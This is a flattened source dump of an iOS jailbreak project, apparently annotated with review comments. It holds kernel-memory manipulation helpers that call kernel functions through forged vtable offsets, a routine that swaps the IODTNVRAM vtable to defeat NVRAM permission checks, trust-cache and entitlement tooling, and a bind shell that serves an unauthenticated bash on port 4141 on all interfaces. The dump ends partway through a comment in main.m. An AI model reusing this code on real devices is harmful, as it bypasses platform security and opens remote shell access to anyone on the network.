// no such variable (it has cr_rgid and cr_svgid only); any use will fail to link.
extern unsigned offsetof_ucred_cr_gid;
extern unsigned offsetof_ucred_cr_rgid;
extern unsigned offsetof_ucred_cr_svgid;
extern unsigned offsetof_ucred_cr_groups;
extern unsigned offsetof_ucred_cr_ngroups;
extern unsigned offsetof_ucred_cr_svuid;

extern unsigned offsetof_v_type;
extern unsigned offsetof_v_id;
extern unsigned offsetof_v_ubcinfo;

extern unsigned offsetof_ubcinfo_csblobs;

extern unsigned offsetof_csb_cputype;
extern unsigned offsetof_csb_flags;
extern unsigned offsetof_csb_base_offset;
extern unsigned offsetof_csb_entitlements_offset;
extern unsigned offsetof_csb_signer_type;
extern unsigned offsetof_csb_platform_binary;
extern unsigned offsetof_csb_platform_path;

extern unsigned offsetof_t_flags;

extern unsigned offsetof_v_mount;
extern unsigned offsetof_v_specinfo;
extern unsigned offsetof_specflags;
extern unsigned offsetof_mnt_flag;
extern unsigned offsetof_mnt_data;
54 |
55 | #define CS_VALID 0x0000001 /* dynamically valid */
56 | #define CS_ADHOC 0x0000002 /* ad hoc signed */
57 | #define CS_GET_TASK_ALLOW 0x0000004 /* has get-task-allow entitlement */
58 | #define CS_INSTALLER 0x0000008 /* has installer entitlement */
59 |
60 | #define CS_HARD 0x0000100 /* don't load invalid pages */
61 | #define CS_KILL 0x0000200 /* kill process if it becomes invalid */
62 | #define CS_CHECK_EXPIRATION 0x0000400 /* force expiration checking */
63 | #define CS_RESTRICT 0x0000800 /* tell dyld to treat restricted */
64 | #define CS_ENFORCEMENT 0x0001000 /* require enforcement */
65 | #define CS_REQUIRE_LV 0x0002000 /* require library validation */
66 | #define CS_ENTITLEMENTS_VALIDATED 0x0004000
67 |
68 | #define CS_ALLOWED_MACHO 0x00ffffe
69 |
70 | #define CS_EXEC_SET_HARD 0x0100000 /* set CS_HARD on any exec'ed process */
71 | #define CS_EXEC_SET_KILL 0x0200000 /* set CS_KILL on any exec'ed process */
72 | #define CS_EXEC_SET_ENFORCEMENT 0x0400000 /* set CS_ENFORCEMENT on any exec'ed process */
73 | #define CS_EXEC_SET_INSTALLER 0x0800000 /* set CS_INSTALLER on any exec'ed process */
74 |
75 | #define CS_KILLED 0x1000000 /* was killed by kernel for invalidity */
76 | #define CS_DYLD_PLATFORM 0x2000000 /* dyld used to load this is a platform binary */
77 | #define CS_PLATFORM_BINARY 0x4000000 /* this is a platform binary */
78 | #define CS_PLATFORM_PATH 0x8000000 /* platform binary by the fact of path (osx only) */
79 |
80 | #define CS_DEBUGGED 0x10000000 /* process is currently or has previously been debugged and allowed to run with invalid pages */
81 | #define CS_SIGNED 0x20000000 /* process has a signature (may have gone invalid) */
82 | #define CS_DEV_CODE 0x40000000 /* code is dev signed, cannot be loaded into prod signed code (will go away with rdar://problem/28322552) */
83 |
84 |
--------------------------------------------------------------------------------
/multi_path/jelbrek/osobject.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include "kexecute.h"
3 | #include "kmem.h"
4 | #include "kern_utils.h"
5 | #include "patchfinder64.h"
6 | #include "osobject.h"
7 |
// offsets in vtable:
// Each value is a byte offset into the class's vtable, i.e. slot index times
// the pointer size. The slot numbers are hard-coded for one kernel build and
// nothing in this file checks them; reading the wrong slot calls an unrelated
// kernel function with these arguments.
static uint32_t off_OSDictionary_SetObjectWithCharP = sizeof(void*) * 0x1F;
static uint32_t off_OSDictionary_GetObjectWithCharP = sizeof(void*) * 0x26;
static uint32_t off_OSDictionary_Merge = sizeof(void*) * 0x23;

static uint32_t off_OSArray_Merge = sizeof(void*) * 0x1E;
static uint32_t off_OSArray_RemoveObject = sizeof(void*) * 0x20;
static uint32_t off_OSArray_GetObject = sizeof(void*) * 0x22;

static uint32_t off_OSObject_Release = sizeof(void*) * 0x05;
static uint32_t off_OSObject_GetRetainCount = sizeof(void*) * 0x03;
static uint32_t off_OSObject_Retain = sizeof(void*) * 0x04;

static uint32_t off_OSString_GetLength = sizeof(void*) * 0x11;
22 |
// 1 on success, 0 on error
// Calls the setObject(const char *key, ...) slot of a kernel OSDictionary
// through kexecute(). The key is copied into a temporary kernel allocation
// for the duration of the call and freed afterwards; the result is the
// callee's boolean, truncated to int.
// NOTE(review): the kalloc() result is not checked — confirm its failure
// value and bail out before kwrite() if it can fail.
int OSDictionary_SetItem(uint64_t dict, const char *key, uint64_t val) {
    size_t len = strlen(key) + 1;   // include the NUL terminator

    uint64_t ks = kalloc(len);
    kwrite(ks, key, len);

    uint64_t vtab = rk64(dict);     // vtable pointer read from the object's first word
    uint64_t f = rk64(vtab + off_OSDictionary_SetObjectWithCharP);

    int rv = (int) kexecute(f, dict, ks, val, 0, 0, 0, 0);

    kfree(ks, len);

    return rv;
}
39 |
// XXX it can return 0 in lower 32 bits but still be valid
// fix addr of returned value and check if rk64 gives ptr
// to vtable addr saved before

// address if exists, 0 if not
// Raw getObject(const char *key) call on a kernel OSDictionary. Returns the
// value exactly as kexecute() delivered it, so callers must go through
// OSDictionary_GetItem() (below) which repairs the address.
// NOTE(review): the result is squeezed through an int before being widened
// back to uint64_t, so the upper half is lost and a set bit 31 sign-extends
// into the high word; zm_fix_addr() in the wrapper is presumably what undoes
// this — confirm before relying on the raw value.
uint64_t _OSDictionary_GetItem(uint64_t dict, const char *key) {
    size_t len = strlen(key) + 1;   // include the NUL terminator

    uint64_t ks = kalloc(len);      // NOTE(review): unchecked, as in OSDictionary_SetItem
    kwrite(ks, key, len);

    uint64_t vtab = rk64(dict);
    uint64_t f = rk64(vtab + off_OSDictionary_GetObjectWithCharP);

    int rv = (int) kexecute(f, dict, ks, 0, 0, 0, 0, 0);

    kfree(ks, len);

    return rv;
}
60 |
// Looks up key in a kernel OSDictionary and returns the object's kernel
// address, or 0 when nothing was found. A non-zero raw result is passed
// through zm_fix_addr() to repair the value handed back by kexecute.
uint64_t OSDictionary_GetItem(uint64_t dict, const char *key) {
    uint64_t obj = _OSDictionary_GetItem(dict, key);
    if (obj == 0) {
        return 0;
    }
    // XXX can it be not in zalloc?.. (kept from the original author)
    return zm_fix_addr(obj);
}
71 |
// Merges the entries of aDict into dict by invoking OSDictionary's merge
// vtable slot in the kernel. Returns 1 on success, 0 on error (callee's bool).
int OSDictionary_Merge(uint64_t dict, uint64_t aDict) {
    uint64_t merge_fn = rk64(rk64(dict) + off_OSDictionary_Merge);
    return (int) kexecute(merge_fn, dict, aDict, 0, 0, 0, 0, 0);
}
79 |
// Appends the elements of aArray to array through OSArray's merge vtable
// slot. Returns 1 on success, 0 on error (callee's bool).
int OSArray_Merge(uint64_t array, uint64_t aArray) {
    uint64_t merge_fn = rk64(rk64(array) + off_OSArray_Merge);
    return (int) kexecute(merge_fn, array, aArray, 0, 0, 0, 0, 0);
}
87 |
// Raw getObject(idx) call on a kernel OSArray. Returns kexecute's value
// untouched; OSArray_GetObject() below is the normalised form.
uint64_t _OSArray_GetObject(uint64_t array, unsigned int idx){
    uint64_t getobj_fn = rk64(rk64(array) + off_OSArray_GetObject);
    return kexecute(getobj_fn, array, idx, 0, 0, 0, 0, 0);
}
94 |
// Returns the kernel address of element idx of a kernel OSArray, or 0 when
// the raw call yields nothing. Non-zero values are run through zm_fix_addr().
uint64_t OSArray_GetObject(uint64_t array, unsigned int idx){
    uint64_t obj = _OSArray_GetObject(array, idx);
    if (obj == 0){
        return 0;
    }
    // XXX can it be not in zalloc?.. (kept from the original author)
    return zm_fix_addr(obj);
}
104 |
// Removes element idx from a kernel OSArray via its removeObject vtable slot;
// the callee's result is discarded.
void OSArray_RemoveObject(uint64_t array, unsigned int idx){
    uint64_t remove_fn = rk64(rk64(array) + off_OSArray_RemoveObject);
    (void)kexecute(remove_fn, array, idx, 0, 0, 0, 0, 0);
}
111 |
// XXX error handling just for fun? :)
// Copies the serialized text into a temporary kernel buffer and calls the
// kernel's OSUnserializeXML (located by find_osunserializexml()) on it.
// Returns kexecute's raw value; OSUnserializeXML() below normalises it.
// NOTE(review): the error-string out-parameter is passed as 0, so any parse
// error reported by the kernel is discarded — that is what the XXX above means.
uint64_t _OSUnserializeXML(const char* buffer) {
    size_t len = strlen(buffer) + 1;   // include the NUL terminator

    uint64_t ks = kalloc(len);         // NOTE(review): unchecked, as in OSDictionary_SetItem
    kwrite(ks, buffer, len);

    uint64_t errorptr = 0;

    uint64_t rv = kexecute(find_osunserializexml(), ks, errorptr, 0, 0, 0, 0, 0);
    kfree(ks, len);

    return rv;
}
126 |
// Deserializes buffer in the kernel and returns the resulting object's kernel
// address, or 0 if the raw call produced nothing. Non-zero results are run
// through zm_fix_addr().
uint64_t OSUnserializeXML(const char* buffer) {
    uint64_t obj = _OSUnserializeXML(buffer);
    if (obj == 0) {
        return 0;
    }
    // XXX can it be not in zalloc?.. (kept from the original author)
    return zm_fix_addr(obj);
}
137 |
// Drops one reference on a kernel OSObject through its release vtable slot.
void OSObject_Release(uint64_t osobject) {
    uint64_t release_fn = rk64(rk64(osobject) + off_OSObject_Release);
    (void) kexecute(release_fn, osobject, 0, 0, 0, 0, 0, 0);
}
143 |
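// Takes one reference on a kernel OSObject through its retain vtable slot.
// Fix: the original read off_OSObject_Release here, so every "retain" in
// fact dropped a reference — the opposite of what callers expect, and a
// use-after-free on a kernel object once the count reaches zero.
void OSObject_Retain(uint64_t osobject) {
    uint64_t vtab = rk64(osobject);
    uint64_t f = rk64(vtab + off_OSObject_Retain);
    (void) kexecute(f, osobject, 0, 0, 0, 0, 0, 0);
}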
149 |
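// Returns the current retain count of a kernel OSObject via its
// getRetainCount vtable slot.
// Fix: the original read off_OSObject_Release here, so asking for the count
// released the object instead and returned release()'s result as the count.
uint32_t OSObject_GetRetainCount(uint64_t osobject) {
    uint64_t vtab = rk64(osobject);
    uint64_t f = rk64(vtab + off_OSObject_GetRetainCount);
    return (uint32_t) kexecute(f, osobject, 0, 0, 0, 0, 0, 0);
}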
155 |
// Returns the length of a kernel OSString via its getLength vtable slot.
unsigned int OSString_GetLength(uint64_t osstring){
    uint64_t getlen_fn = rk64(rk64(osstring) + off_OSString_GetLength);
    uint64_t raw = kexecute(getlen_fn, osstring, 0, 0, 0, 0, 0, 0);
    return (unsigned int) raw;
}
161 |
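// Copies the bytes of a kernel OSString into a freshly malloc'd,
// NUL-terminated userland buffer. Returns NULL if the allocation fails;
// otherwise the caller owns and frees the result.
char *OSString_CopyString(uint64_t osstring){
    unsigned int length = OSString_GetLength(osstring);
    // length comes from the kernel object; add 1 in size_t so UINT_MAX cannot
    // wrap to a zero-byte allocation that the write below would overrun.
    char *str = malloc((size_t)length + 1);
    if (str == NULL) {
        return NULL;            // original dereferenced the NULL here
    }
    str[length] = 0;

    // OSString_CStringPtr (osobject.h) reads the object's string pointer.
    kread(OSString_CStringPtr(osstring), str, length);
    return str;
}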
170 |
--------------------------------------------------------------------------------
/multi_path/jelbrek/osobject.h:
--------------------------------------------------------------------------------
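// Raw field reads on kernel OSDictionary / OSArray / OSString objects via the
// kmem read primitives. The numeric offsets are hard-coded for one kernel
// build and nothing here validates them; a mismatch silently reads the wrong
// field. Macro arguments are parenthesised so an expression argument such as
// base+8 evaluates as intended (the original expanded it unparenthesised).
#define OSDictionary_ItemCount(dict) kread32((dict)+20)
#define OSDictionary_ItemBuffer(dict) kread64((dict)+32)
#define OSDictionary_ItemKey(buffer, idx) kread64((buffer)+16*(idx))
#define OSDictionary_ItemValue(buffer, idx) kread64((buffer)+16*(idx)+8)
#define OSString_CStringPtr(str) kread64((str) + 0x10)
#define OSArray_ItemCount(arr) kread32((arr)+0x14)
#define OSArray_ItemBuffer(arr) kread64((arr)+32)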
8 |
9 | // see osobject.c for info
10 |
11 | int OSDictionary_SetItem(uint64_t dict, const char *key, uint64_t val);
12 | uint64_t OSDictionary_GetItem(uint64_t dict, const char *key);
13 | int OSDictionary_Merge(uint64_t dict, uint64_t aDict);
14 | void OSArray_RemoveObject(uint64_t array, unsigned int idx);
15 | uint64_t OSArray_GetObject(uint64_t array, unsigned int idx);
16 | int OSArray_Merge(uint64_t array, uint64_t aArray);
17 | uint64_t OSUnserializeXML(const char* buffer);
18 |
19 | void OSObject_Release(uint64_t osobject);
20 | void OSObject_Retain(uint64_t osobject);
21 | uint32_t OSObject_GetRetainCount(uint64_t osobject);
22 |
23 | unsigned int OSString_GetLength(uint64_t osstring);
24 | char *OSString_CopyString(uint64_t osstring);
25 |
--------------------------------------------------------------------------------
/multi_path/jelbrek/patchfinder64.h:
--------------------------------------------------------------------------------
1 | #ifndef PATCHFINDER64_H_
2 | #define PATCHFINDER64_H_
3 |
4 | int init_kernel(uint64_t base, const char *filename);
5 | void term_kernel(void);
6 |
7 | // Fun part
8 | uint64_t find_allproc(void);
9 | uint64_t find_add_x0_x0_0x40_ret(void);
10 | uint64_t find_copyout(void);
11 | uint64_t find_bzero(void);
12 | uint64_t find_bcopy(void);
13 | uint64_t find_rootvnode(void);
14 | uint64_t find_trustcache(void);
15 | uint64_t find_amficache(void);
16 | uint64_t find_OSBoolean_True(void);
17 | uint64_t find_OSBoolean_False(void);
18 | uint64_t find_zone_map_ref(void);
19 | uint64_t find_osunserializexml(void);
20 | uint64_t find_smalloc(void);
21 | #endif
22 |
--------------------------------------------------------------------------------
/multi_path/jelbrek/qilin.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/jelbrek/qilin.o
--------------------------------------------------------------------------------
/multi_path/jelbrek/remap_tfp_set_hsp.h:
--------------------------------------------------------------------------------
1 | //
2 | // remap_tfp_set_hsp.h
3 | // electra
4 | //
5 | // Created by Viktor Oreshkin on 16.01.18.
6 | // Copyright © 2018 Electra Team. All rights reserved.
7 | //
8 |
9 | #ifndef remap_tfp_set_hsp_h
10 | #define remap_tfp_set_hsp_h
11 |
12 | #include
13 |
14 | int remap_tfp0_set_hsp4(mach_port_t *port);
15 |
16 | #endif /* remap_tfp_set_hsp_h */
17 |
--------------------------------------------------------------------------------
/multi_path/jelbrek/shell.c:
--------------------------------------------------------------------------------
1 |
2 | /* J. Levin has compiled a bunch of Apple open-source utilities for arm64
3 | * You can get them from his site here: http://newosxbook.com/tools/iOSBinaries.html
4 | *
5 | * Follow the link to "The 64-bit tgz pack"
6 | *
7 | * Unpack the tarball into a directory called iosbinpack64 and drag-and-drop
8 | * that directory into the directory with all the source files in in XCode
9 | * so that it ends up in the .app bundle
10 | */
11 |
12 | #include
13 | #include
14 | #include
15 | #include
16 |
17 | #include
18 |
19 | #include
20 | #include
21 | #include
22 |
23 | #include
24 | #include
25 | #include
26 |
27 | #include
28 |
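// Returns the main bundle's resources directory as a malloc'd C string that
// the caller frees, or NULL if the URL could not be obtained, the buffer
// could not be allocated, or the path did not fit in the buffer.
char* bundle_path() {
    CFBundleRef mainBundle = CFBundleGetMainBundle();
    CFURLRef resourcesURL = CFBundleCopyResourcesDirectoryURL(mainBundle);
    if (resourcesURL == NULL) {
        return NULL;
    }

    int len = 4096;
    char* path = malloc(len);
    if (path == NULL) {
        CFRelease(resourcesURL);
        return NULL;
    }

    // Returns false when the path does not fit in len bytes; the buffer is
    // then unusable, so report failure rather than hand back garbage (the
    // original ignored the result).
    Boolean ok = CFURLGetFileSystemRepresentation(resourcesURL, TRUE, (UInt8*)path, len);
    // Copy-rule object: we own it and must release it (the original leaked it).
    CFRelease(resourcesURL);

    if (!ok) {
        free(path);
        return NULL;
    }
    return path;
}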
39 |
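// Marks every entry under <bundle>/iosbinpack64/<dir_path> executable and
// returns that directory's absolute path as a malloc'd string (caller frees).
// Returns NULL when the bundle path or the directory cannot be resolved; the
// original leaked bundle_root and in_path on that path.
char* prepare_directory(char* dir_path) {
    char* bundle_root = bundle_path();
    if (bundle_root == NULL) {
        printf("unable to resolve bundle path\n");
        return NULL;
    }

    char* in_path = NULL;
    if (asprintf(&in_path, "%s/iosbinpack64/%s", bundle_root, dir_path) < 0) {
        free(bundle_root);
        return NULL;
    }

    DIR *dp = opendir(in_path);
    if (dp == NULL) {
        printf("unable to open payload directory: %s\n", in_path);
        free(in_path);
        free(bundle_root);
        return NULL;
    }

    struct dirent *ep;
    while ((ep = readdir(dp))) {
        char* entry = ep->d_name;
        // readdir also yields "." and ".."; chmod'ing those would change the
        // mode of this directory and its parent, which is not the intent.
        if (strcmp(entry, ".") == 0 || strcmp(entry, "..") == 0) {
            continue;
        }

        char* full_entry_path = NULL;
        if (asprintf(&full_entry_path, "%s/iosbinpack64/%s/%s", bundle_root, dir_path, entry) < 0) {
            printf("unable to build path for: %s\n", entry);
            continue;
        }

        printf("preparing: %s\n", full_entry_path);

        // make that executable:
        // 0755 keeps the execute bit for everyone but leaves the files writable
        // only by their owner; the original's 0777 made the payload binaries
        // world-writable, so anything that can reach the bundle could swap them.
        int chmod_err = chmod(full_entry_path, 0755);
        if (chmod_err != 0){
            printf("chmod failed\n");
        }

        free(full_entry_path);
    }

    closedir(dp);
    free(bundle_root);

    return in_path;
}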
76 |
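// Append src to the fixed-size PATH buffer without overflowing it.
// Returns 0 on success, -1 if src does not fit (buffer left unchanged).
static int path_append(char* path, size_t path_size, const char* src) {
    size_t used = strlen(path);
    size_t need = strlen(src);
    if (need >= path_size - used) {
        return -1;
    }
    memcpy(path + used, src, need + 1);   // +1 copies the terminator
    return 0;
}

// prepare all the payload binaries under the iosbinpack64 directory
// and build up the PATH
// Returns a malloc'd "PATH=..." string (caller frees), or NULL if the buffer
// could not be allocated. A directory that prepare_directory() cannot
// resolve is skipped with a message; the original passed its NULL straight
// into strcat(). Appends are bounds-checked instead of using bare strcat().
char* prepare_payload() {
    static const char* const dirs[] = {"bin", "sbin", "usr/bin", "usr/local/bin", "usr/sbin"};
    const size_t path_size = 4096;

    char* path = calloc(path_size, 1);
    if (path == NULL) {
        return NULL;
    }
    path_append(path, path_size, "PATH=");

    for (size_t i = 0; i < sizeof(dirs) / sizeof(dirs[0]); i++) {
        char* dir = prepare_directory((char*)dirs[i]);
        if (dir == NULL) {
            printf("skipping payload directory: %s\n", dirs[i]);
            continue;
        }
        // Reserve room for the trailing ':' too so a partial append cannot
        // leave a directory without its separator.
        if (strlen(path) + strlen(dir) + 1 >= path_size) {
            printf("PATH too long, dropping: %s\n", dir);
        } else {
            path_append(path, path_size, dir);
            path_append(path, path_size, ":");
        }
        free(dir);
    }

    // System locations come last so the bundled tools take precedence.
    path_append(path, path_size, "/bin:/sbin:/usr/bin:/usr/sbin:/usr/libexec");

    return path;
}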
112 |
// Listens on TCP `port` and, for every accepted connection, spawns the bundled
// bash with the connection as its stdin/stdout/stderr and `env` (the PATH
// string from prepare_payload) as its only environment entry. Loops forever
// and never returns, so bundle_root and shell_path are never freed.
// Risk note: the socket is bound to INADDR_ANY and nothing authenticates the
// peer, so any host that can reach this port gets a shell with this process's
// privileges; binding to the loopback address would confine it to the device.
void do_bind_shell(char* env, int port) {
    char* bundle_root = bundle_path();

    char* shell_path = NULL;
    asprintf(&shell_path, "%s/iosbinpack64/bin/bash", bundle_root);

    char* argv[] = {shell_path, NULL};
    char* envp[] = {env, NULL};

    struct sockaddr_in sa;
    sa.sin_len = 0;                  // NOTE(review): bind() below is given sizeof(sa) explicitly, so sin_len is presumably not relied on — confirm
    sa.sin_family = AF_INET;
    sa.sin_port = htons(port);
    sa.sin_addr.s_addr = INADDR_ANY; // all interfaces; see the risk note above

    // NOTE(review): socket(), bind() and listen() results are ignored; if bind()
    // fails (e.g. port already in use) the loop below spins on accept() errors.
    int sock = socket(PF_INET, SOCK_STREAM, 0);
    bind(sock, (struct sockaddr*)&sa, sizeof(sa));
    listen(sock, 1);

    printf("shell listening on port %d\n", port);

    for(;;) {
        int conn = accept(sock, 0, 0);   // NOTE(review): -1 on failure is not checked before being dup'd below

        posix_spawn_file_actions_t actions;

        // Route the child's stdin, stdout and stderr to the connection.
        posix_spawn_file_actions_init(&actions);
        posix_spawn_file_actions_adddup2(&actions, conn, 0);
        posix_spawn_file_actions_adddup2(&actions, conn, 1);
        posix_spawn_file_actions_adddup2(&actions, conn, 2);


        pid_t spawned_pid = 0;
        int spawn_err = posix_spawn(&spawned_pid, shell_path, &actions, NULL, argv, envp);

        if (spawn_err != 0){
            perror("shell spawn error");   // NOTE(review): posix_spawn returns the error code rather than setting errno, so this message may be misleading
        } else {
            printf("shell posix_spawn success!\n");
        }

        posix_spawn_file_actions_destroy(&actions);

        printf("our pid: %d\n", getpid());
        printf("spawned_pid: %d\n", spawned_pid);

        // NOTE(review): conn is never close()d in this process, so one descriptor
        // leaks per connection and the peer's socket stays open after the shell exits.
        int wl = 0;
        while (waitpid(spawned_pid, &wl, 0) == -1 && errno == EINTR);   // retry if interrupted by a signal
    }
}
163 |
// Builds the PATH from the bundled iosbinpack64 tree and starts the bind
// shell on port 4141. do_bind_shell() loops forever, so the free() below is
// never reached in practice.
// NOTE(review): prepare_payload()'s result is printed and used without a
// NULL check.
void drop_payload() {
    char* env_path = prepare_payload();
    printf("will launch a shell with this environment: %s\n", env_path);

    do_bind_shell(env_path, 4141);
    free(env_path);
}
171 |
--------------------------------------------------------------------------------
/multi_path/jelbrek/shell.h:
--------------------------------------------------------------------------------
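#ifndef drop_payload_h
#define drop_payload_h

/* Builds the PATH from the bundled iosbinpack64 tree, then runs the bind
 * shell loop from shell.c; that loop never returns. */
void drop_payload(void);
/* Returns a malloc'd "PATH=..." string; the caller frees it. */
char* prepare_payload(void);
/* Returns a malloc'd path to the app bundle's resources directory; the
 * caller frees it. */
char* bundle_path(void);

#endif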
9 |
--------------------------------------------------------------------------------
/multi_path/jelbrek/unlocknvram.c:
--------------------------------------------------------------------------------
1 | // iOS 11 moves OFVariables to const
2 | // https://twitter.com/s1guza/status/908790514178301952
3 | // however, if we:
4 | // 1) Can find IODTNVRAM service
5 | // 2) Have tfp0 / kernel read|write|alloc
6 | // 3) Can leak kernel address of mach port
7 | // then we can fake vtable on IODTNVRAM object
8 | // async_wake satisfies those requirements
9 | // however, I wasn't able to actually set or get ANY nvram variable
10 | // not even userread/userwrite
11 | // Presumably the sandbox does not allow access to nvram
12 |
13 | #include
14 | #include
15 | #include "kern_utils.h"
16 | #include "offsetof.h"
17 | #include "../offsets.h"
18 |
// convertPropToObject calls getOFVariableType
// open convertPropToObject, look for first vtable call -- that'd be getOFVariableType
// find xrefs, figure out vtable start from that
// following are offsets of entries in vtable
// NOTE(review): these two file-scope constants are shadowed by identical
// locals inside unlocknvram(), so they are effectively unused there; keep
// one copy. Both are byte offsets into the IODTNVRAM vtable for one kernel build.

// it always returns false
const uint64_t searchNVRAMProperty = 0x590;
// 0 corresponds to root only
const uint64_t getOFVariablePerm = 0x558;

// Hand-written IOKit declarations so this file does not pull in the IOKit
// headers; IOObjectRelease is not among them, so service handles obtained
// below are never released.
typedef mach_port_t io_service_t;
typedef mach_port_t io_connect_t;
extern const mach_port_t kIOMasterPortDefault;
CFMutableDictionaryRef IOServiceMatching(const char *name) CF_RETURNS_RETAINED;
io_service_t IOServiceGetMatchingService(mach_port_t masterPort, CFDictionaryRef matching CF_RELEASES_ARGUMENT);
34 |
35 |
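// get kernel address of IODTNVRAM object
// Returns 0 when the IODTNVRAM service cannot be found, so callers can tell
// "no service" from a real address instead of a null port being fed into
// find_port_address() (the original did not check).
// NOTE(review): this reads the kobject field via offsetof_ip_kobject while
// unlocknvram() uses koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT) for the
// same field; both are 0x68 in this tree, but one source should be used.
uint64_t get_iodtnvram_obj(void) {
    // get user serv
    io_service_t IODTNVRAMSrv = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IODTNVRAM"));
    if (IODTNVRAMSrv == 0) {   // MACH_PORT_NULL: no matching service
        return 0;
    }

    // leak user serv
    uint64_t nvram_up = find_port_address(IODTNVRAMSrv);
    // get kern obj -- IODTNVRAM*
    uint64_t IODTNVRAMObj = kread64(nvram_up + offsetof_ip_kobject);

    // NOTE(review): the service handle is not released; IOObjectRelease is
    // not declared in this file.
    return IODTNVRAMObj;
}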
48 |
// Replaces the IODTNVRAM object's vtable with a copy in which the
// getOFVariablePerm slot points at searchNVRAMProperty. Per the comments on
// the file-scope constants, that method always returns false (0) and 0 is the
// "root only" permission, so every OF variable then reports root-level access
// instead of whatever more restrictive value the real method returns.
// NOTE(review): the two const locals below shadow identical file-scope
// constants; keep one copy.
// NOTE(review): everything here is tied to one kernel build — the vtable
// slot offsets, the end-of-vtable heuristic and the koffset() value are all
// unvalidated, and a wrong value corrupts a live kernel object.
void unlocknvram(void) {
    const uint64_t searchNVRAMProperty = 0x590;
    // 0 corresponds to root only
    const uint64_t getOFVariablePerm = 0x558;
    // get user serv
    // NOTE(review): not checked for a null port (compare get_iodtnvram_obj above);
    // the handle is also never released.
    io_service_t IODTNVRAMSrv = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IODTNVRAM"));

    // leak user serv
    // it should use via_kmem_read method by now, so second param doesn't matter
    uint64_t nvram_up = find_port_address(IODTNVRAMSrv);
    // get kern obj -- IODTNVRAM*
    uint64_t IODTNVRAMObj = kread64(nvram_up + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));
    uint64_t vtable_start = kread64(IODTNVRAMObj);
    uint64_t vtable_end = vtable_start;
    // Is vtable really guaranteed to end with 0 or was it just a coincidence?..
    // should we just use some max value instead?
    // NOTE(review): unbounded scan — if no zero qword follows the table this
    // keeps reading kernel memory until kread64 fails.
    while (kread64(vtable_end) != 0) vtable_end += sizeof(uint64_t);

    uint32_t vtable_len = (uint32_t) (vtable_end - vtable_start);

    // copy vtable to userspace
    uint64_t *buf = calloc(1, vtable_len);   // NOTE(review): result unchecked; also assumes vtable_len covers both slot offsets used below
    kread(vtable_start, buf, vtable_len);

    // alter it
    buf[getOFVariablePerm/sizeof(uint64_t)] = buf[searchNVRAMProperty/sizeof(uint64_t)];

    // allocate buffer in kernel and copy it back
    // The wired allocation is not freed here: the object keeps pointing at it,
    // so it must outlive this function.
    uint64_t fake_vtable = kmem_alloc_wired(vtable_len);
    kwrite(fake_vtable, buf, vtable_len);

    // replace vtable on IODTNVRAM object
    kwrite64(IODTNVRAMObj, fake_vtable);

    free(buf);
}
85 |
--------------------------------------------------------------------------------
/multi_path/jelbrek/unlocknvram.h:
--------------------------------------------------------------------------------
1 | void unlocknvram(void);
2 |
--------------------------------------------------------------------------------
/multi_path/kmem.h:
--------------------------------------------------------------------------------
1 | #ifndef kmem_h
2 | #define kmem_h
3 |
4 | extern mach_port_t tfp0;
5 |
6 | uint32_t rk32(uint64_t kaddr);
7 | uint64_t rk64(uint64_t kaddr);
8 |
9 | void wk32(uint64_t kaddr, uint32_t val);
10 | void wk64(uint64_t kaddr, uint64_t val);
11 |
12 | #endif
13 |
--------------------------------------------------------------------------------
/multi_path/launchctl/Ent.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | platform-application
6 |
7 | get-task-allow
8 |
9 | com.apple.system-task-ports
10 |
11 | task_for_pid-allow
12 |
13 | com.apple.private.security.container-required
14 |
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/multi_path/launchctl/Makefile:
--------------------------------------------------------------------------------
TARGET = launchctl
OUTDIR ?= bin

CC = xcrun -sdk iphoneos cc -arch arm64
# it is injected into trust cache by code
# which only supports sha-256 signatures
LDID = ldid2
CFLAGS = -Wall -Iinclude

.PHONY: all clean

DEBUG ?= 0
ifeq ($(DEBUG), 1)
# NOTE(review): this define appears to be inherited from another target's
# Makefile; the main.m in this directory does not test INJECT_CRITICALD_DEBUG,
# so DEBUG=1 currently only drops -O2 here — confirm what was intended.
CFLAGS += -DINJECT_CRITICALD_DEBUG
else
CFLAGS += -O2
endif

all: $(OUTDIR)/$(TARGET)

$(OUTDIR):
	mkdir -p $(OUTDIR)

# Links every .m in this directory against Foundation/IOKit plus the
# AppSupport.tbd stub, then signs the result with the entitlements in Ent.plist.
$(OUTDIR)/$(TARGET): *.m | $(OUTDIR)
	$(CC) -o $@ $^ -framework Foundation -framework IOKit $(CFLAGS) AppSupport.tbd
	$(LDID) -SEnt.plist $@

clean:
	rm -f $(OUTDIR)/$(TARGET)
30 |
--------------------------------------------------------------------------------
/multi_path/launchctl/include/AppSupport/CPBitmapStore.h:
--------------------------------------------------------------------------------
1 | @interface CPBitmapStore : NSObject
2 |
3 | - (void)purge;
4 |
5 | @end
6 |
--------------------------------------------------------------------------------
/multi_path/launchctl/include/AppSupport/CPDistributedMessagingCenter.h:
--------------------------------------------------------------------------------
1 | @interface CPDistributedMessagingCenter : NSObject
2 |
3 | + (instancetype)centerNamed:(NSString *)name;
4 |
5 | - (void)runServer;
6 | - (void)runServerOnCurrentThread;
7 | - (void)stopServer;
8 |
9 | - (void)registerForMessageName:(NSString *)messageName target:(id)target selector:(SEL)selector;
10 |
11 | - (BOOL)sendMessageName:(NSString *)messageName userInfo:(NSDictionary *)userInfo;
12 |
13 | - (NSDictionary *)sendMessageAndReceiveReplyName:(NSString *)messageName userInfo:(NSDictionary *)userInfo;
14 | - (NSDictionary *)sendMessageAndReceiveReplyName:(NSString *)messageName userInfo:(NSDictionary *)userInfo error:(NSError **)error;
15 |
16 | @end
17 |
--------------------------------------------------------------------------------
/multi_path/launchctl/main.m:
--------------------------------------------------------------------------------
1 | #import
2 | #include
3 | #include
4 |
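// Wrapper around the real launchctl binary (launchctl_, next to this one in
// the bundle): spawns it suspended, asks the jbclient message center to
// platformize the new pid, then resumes it and waits for it to finish.
// Fixes: if posix_spawn fails there is no child and pd is meaningless, yet the
// original still sent the platformize request and kill(pd, SIGCONT) — with an
// uninitialised pd that can signal an unrelated process. The spawn attributes
// are now destroyed, and the child's exit status is propagated instead of the
// always-zero spawn result.
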